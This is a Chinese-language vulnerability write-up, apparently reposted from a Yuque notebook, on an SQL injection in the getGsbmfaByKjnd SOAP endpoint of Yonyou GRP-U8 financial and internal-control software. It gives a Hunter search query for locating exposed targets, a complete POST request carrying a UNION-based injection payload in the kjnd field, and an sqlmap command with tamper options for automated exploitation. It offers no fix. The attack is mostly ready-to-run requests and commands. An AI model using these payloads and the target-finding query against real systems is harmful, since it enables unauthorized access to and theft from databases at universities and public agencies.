登录 白背景
源码

用友GRP-U8 getGsbmfaByKjndSQL注入漏洞

一、漏洞简介

用友GRP-U8高校内控管理软件(G版)——收费管理产品不同于传统财务学生收费,产品秉承“立足传统、创新求精、面向当代、开放多元”的宗旨,建立从移动支付、网上缴费、银行批量代扣到柜台缴费等多种线上、线下缴费途径,集学生收费、多种支付方式、决策分析于一体的综合收费管理平台。用友GRP-U8高校内控管理软件(G版)getGsbmfaByKjnd接口存在SQL注入漏洞,攻击者通过该漏洞可以获取数据库敏感信息。

二、影响版本

  • 用友GRP-U8 高校内控管理软件 Manager 版、用友GRP-U8 (行政事业内控管理软件 Manager-G 版)

三、资产测绘

  • hunterapp.name="用友GRP-U8 OA"&&web.title="用友GRP-U8 高校内控管理软件 Manager 版"||web.title="用友GRP-U8 (行政事业内控管理软件 Manager-G 版)"

image.png

  • 特征

image.png

四、漏洞复现

漏洞位置

/services
/services/operOriztion?wsdl

image.png
参数kjnd存在SQL注入漏洞,返回响应为“qzvpqOZOHMMvtbLzaUYEuIzdQlgzOnITofSgBOeIxSsofqbvbq”表示存在漏洞

POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=8938F59A7F2E7F69D978EFB272B314AE
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 977

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
   <soapenv:Header/>
   <soapenv:Body>
      <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <kjnd xsi:type="xsd:string">gero et' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(79)+CHAR(90)+CHAR(79)+CHAR(72)+CHAR(77)+CHAR(77)+CHAR(118)+CHAR(116)+CHAR(98)+CHAR(76)+CHAR(122)+CHAR(97)+CHAR(85)+CHAR(89)+CHAR(69)+CHAR(117)+CHAR(73)+CHAR(122)+CHAR(100)+CHAR(81)+CHAR(108)+CHAR(103)+CHAR(122)+CHAR(79)+CHAR(110)+CHAR(73)+CHAR(84)+CHAR(111)+CHAR(102)+CHAR(83)+CHAR(103)+CHAR(66)+CHAR(79)+CHAR(101)+CHAR(73)+CHAR(120)+CHAR(83)+CHAR(115)+CHAR(111)+CHAR(102)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113)-- aKCq</kjnd>
      </wsdd:getGsbmfaByKjnd>
   </soapenv:Body>
</soapenv:Envelope>

image.png
sqlmap

POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=8938F59A7F2E7F69D978EFB272B314AE
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 477

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
   <soapenv:Header/>
   <soapenv:Body>
      <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <kjnd xsi:type="xsd:string">gero et</kjnd>
      </wsdd:getGsbmfaByKjnd>
   </soapenv:Body>
</soapenv:Envelope>
sqlmap -r 1.txt --batch --tamper=space2comment --random-agent --is-dba

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gbrqkgc8w3boc6bv